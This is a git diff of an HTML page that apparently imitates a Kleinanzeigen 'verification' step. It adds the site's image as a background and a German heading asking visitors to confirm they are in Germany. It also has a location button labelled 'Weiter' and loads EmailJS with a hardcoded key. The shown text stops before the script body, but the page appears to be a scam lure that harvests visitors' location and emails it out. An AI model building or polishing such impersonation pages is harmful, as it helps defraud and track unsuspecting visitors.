--- a/index.html
+++ b/index.html
@@ -3,24 +3,56 @@
 <head>
   <meta charset="UTF-8">
   <meta name="viewport" content="width=device-width, initial-scale=1.0">
-  <title>Weiter</title>
+  <title>Verifizierung</title>
   <style>
     body {
       font-family: Arial, sans-serif;
       text-align: center;
-      margin-top: 50px;
+      margin: 0;
+      padding: 0;
+      background-image: url('kleinanzeigen.jpg'); /* Replace with your image URL */
+      background-size: cover;
+      background-position: center;
+      background-repeat: no-repeat;
+      height: 100vh;
+      display: flex;
+      flex-direction: column;
+      justify-content: flex-start; /* Align content to the top */
+      align-items: center;
+      padding-top: 100px; /* Adds spacing from the top */
+    }
+    h1 {
+      font-family: Arial, sans-serif;
+      font-weight: bold;
+      color: white;
+      text-shadow: 2px 2px 4px rgba(0, 0, 0, 0.7);
+      padding: 10px 20px;
+      border: 2px solid white; /* Adds a border around the text */
+      border-radius: 10px; /* Rounded border for the text */
+      background: rgba(0, 0, 0, 0.5); /* Semi-transparent background for better readability */
+      display: inline-block;
     }
     button {
-      padding: 10px 20px;
-      font-size: 16px;
+      margin-top: 20px; /* Adds space between the text and button */
+      padding: 20px 30px;
+      font-size: 30px;
+      font-family: Verdana, sans-serif;
+      font-weight: bold;
+      color: white;
+      background-color: green;
+      border: none;
+      border-radius: 20px;
       cursor: pointer;
+    }
+    button:hover {
+      background-color: darkgreen; /* Slightly darker shade on hover */
     }
   </style>
   <script src="https://cdn.jsdelivr.net/npm/@emailjs/browser@4/dist/email.min.js"></script>
 </head>
 <body>
+  <h1>Bitte verifizieren Sie, dass Sie sich in Deutschland befinden!</h1>
   <button id="getLocationBtn">Weiter</button>
-
   <script>
     (function() {
       emailjs.init('9x-l5mk9badvHiIkw'); // Replace with your EmailJS user ID
